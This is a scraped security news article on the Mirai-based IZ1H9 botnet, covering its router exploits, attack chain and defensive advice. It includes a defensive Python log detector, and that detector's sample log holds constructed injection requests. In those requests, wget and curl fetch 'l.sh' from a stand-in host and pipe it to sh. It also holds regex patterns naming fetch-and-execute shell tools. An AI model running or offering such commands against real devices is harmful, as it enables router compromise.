Article Details
Scrape Timestamp (UTC): 2023-10-10 20:39:58.625
Original Article Text
Mirai DDoS malware variant expands targets with 13 router exploits

A Mirai-based DDoS (distributed denial of service) malware botnet tracked as IZ1H9 has added thirteen new payloads targeting Linux-based routers and routers from D-Link, Zyxel, TP-Link, TOTOLINK, and others.

Fortinet researchers report observing a peak in exploitation rates around the first week of September, reaching tens of thousands of exploitation attempts against vulnerable devices.

IZ1H9 compromises devices to enlist them in its DDoS swarm and then launches DDoS attacks on specified targets, presumably on behalf of clients renting its firepower.

Extensive IoT targeting

The more devices and vulnerabilities a DDoS malware targets, the larger and more powerful the botnet it can build, and the heavier the blows it can deliver against websites. In the case of IZ1H9, Fortinet reports it uses exploits for the following flaws, dating from 2015 to 2023:

The campaign also targets an unspecified CVE related to the "/cgi-bin/login.cgi" route, potentially affecting the Prolink PRC2402M router.

Attack chain

After exploiting one of the aforementioned CVEs, IZ1H9 injects a payload into the device containing a command to fetch a shell-script downloader named "l.sh" from a specified URL. When executed, the script deletes logs to hide the malicious activity and then fetches bot clients built for different system architectures. Finally, the script modifies the device's iptables rules to block connections on specific ports, making it harder to remove the malware from the device.

Having done all of the above, the bot establishes communication with the C2 (command and control) server and waits for commands. The supported commands select the type of DDoS attack to launch: UDP, UDP Plain, HTTP Flood, and TCP SYN.

Fortinet also reports that IZ1H9 contains a data section with hardcoded credentials used for brute-force attacks. These attacks may help it propagate to adjacent devices or authenticate to IoT devices for which it has no working exploit.

Owners of IoT devices are advised to use strong admin credentials, update to the latest available firmware version, and, where possible, reduce the devices' exposure to the public internet.
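The first stage of the attack chain described above (an injected command that fetches the "l.sh" downloader and runs it) leaves a recognisable trace in any web-server or honeypot access log. The following Python detector is an added example written for this page, not code from the article or from Fortinet: it parses combined-format access-log lines, URL-decodes the request target (payloads are often double-encoded), flags the "remote fetch plus shell execution" pattern, extracts the dropper URL and file name, and counts attempts per source address so a spike like the one the article describes is visible. The log lines, IP addresses and the exact request paths are constructed for the example and are not real captures.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample lines (not real captures), combined access-log format.
# Two of them carry a Mirai-style injection that fetches "l.sh" and runs it.
SAMPLE_LOG = r"""
203.0.113.7 - - [05/Sep/2023:01:12:03 +0000] "POST /cgi-bin/login.cgi HTTP/1.1" 200 512 "-" "-"
203.0.113.7 - - [05/Sep/2023:01:12:04 +0000] "GET /setup.cgi?todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://198.51.100.9/l.sh+-O+/tmp/l.sh;sh+/tmp/l.sh HTTP/1.1" 200 12 "-" "-"
198.51.100.23 - - [05/Sep/2023:01:13:55 +0000] "POST /boaform/admin/formPing HTTP/1.1" 200 32 "-" "-"
203.0.113.7 - - [05/Sep/2023:01:14:10 +0000] "GET /cgi-bin/login.cgi?user=admin;curl%20http%3A%2F%2F198.51.100.9%2Fl.sh%7Csh HTTP/1.1" 200 0 "-" "-"
192.0.2.55 - - [05/Sep/2023:01:15:00 +0000] "GET /index.html HTTP/1.1" 200 1034 "-" "-"
"""

# Source address, timestamp, method and request target of a combined-format line.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Indicators of the "fetch a script, then execute it" injection pattern.
URL_RE = re.compile(r'(?:https?|tftp|ftp)://[^\s;|&\'"<>]+')
FETCH_RE = re.compile(r'\b(?:wget|curl|tftp|ftpget)\b')
EXEC_RE = re.compile(r'(?:;|\||&&)\s*(?:/bin/)?(?:sh|bash)\b')
CHMOD_RE = re.compile(r'\bchmod\s+(?:\+x|[0-7]{3,4})\b')


def decode_target(target: str) -> str:
    """URL-decode until stable (max three rounds); payloads are often double-encoded."""
    prev, cur = None, target
    for _ in range(3):
        if cur == prev:
            break
        prev, cur = cur, unquote_plus(cur)
    return cur


def indicators(decoded: str) -> list:
    """Return the list of injection indicators present in a decoded request target."""
    found = []
    if FETCH_RE.search(decoded):
        found.append("remote-fetch")
    if EXEC_RE.search(decoded):
        found.append("shell-exec-chain")
    if CHMOD_RE.search(decoded):
        found.append("chmod")
    return found


def parse_line(line: str):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["decoded"] = decode_target(rec["target"])
    rec["path"] = rec["decoded"].split("?", 1)[0]
    rec["indicators"] = indicators(rec["decoded"])
    urls = URL_RE.findall(rec["decoded"])
    rec["dropper_urls"] = urls
    rec["dropper_names"] = [u.rsplit("/", 1)[-1] for u in urls]
    return rec


def is_downloader_injection(rec: dict) -> bool:
    """A fetch tool combined with execution (or chmod) is the downloader pattern proper."""
    ind = rec["indicators"]
    return "remote-fetch" in ind and ("shell-exec-chain" in ind or "chmod" in ind)


def analyze(log_text: str):
    """Return (matching records, attempts per source address) for a block of log text."""
    hits, per_source = [], Counter()
    for raw in log_text.strip().splitlines():
        rec = parse_line(raw)
        if rec and is_downloader_injection(rec):
            hits.append(rec)
            per_source[rec["src"]] += 1
    return hits, per_source


if __name__ == "__main__":
    hits, per_source = analyze(SAMPLE_LOG)
    for h in hits:
        print(h["src"], h["path"], h["indicators"], h["dropper_urls"])
    print("attempts per source:", dict(per_source))
```

On the sample input the two injected requests are flagged, both resolve to the dropper file name "l.sh" hosted on the same address, and the per-source counter attributes both attempts to one scanner. Running this over a real edge log will also surface benign administrative requests that happen to contain "curl" or "sh" in a parameter, so treat the indicator list as a triage signal and pivot on the extracted dropper URL rather than blocking on the pattern alone.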
Daily Brief Summary
A variant of the Mirai-based DDoS (distributed denial of service) malware botnet known as IZ1H9 has added 13 new payloads to increase its target range. It primarily targets Linux-based routers and certain router models from companies like D-Link, Zyxel, TP-Link, and TOTOLINK.
IZ1H9 compromises devices, assimilates them into its DDoS swarm, and then uses these devices to launch DDoS attacks on specified targets. IoT (Internet of Things) devices are believed to be a significant target group for this botnet.
Peak exploitation rates for IZ1H9 were recorded in early September, with tens of thousands of attempts on vulnerable devices.
Upon breaching a device, IZ1H9 injects a payload that fetches a shell script downloader called "l.sh". The script deletes logs, downloads bot clients for different system architectures, and modifies the device's iptables rules to block certain ports, making the malware harder to remove.
IZ1H9 also reportedly has a data section with hardcoded credentials that it uses for brute-force attacks. This enhances its capacity for propagation to adjacent devices or access to IoT devices for which it lacks a working exploit.
To minimize the risk of becoming victim to such an attack, IoT device owners are advised to use strong admin user credentials, regularly update their firmware, and limit the devices' exposure to the public internet.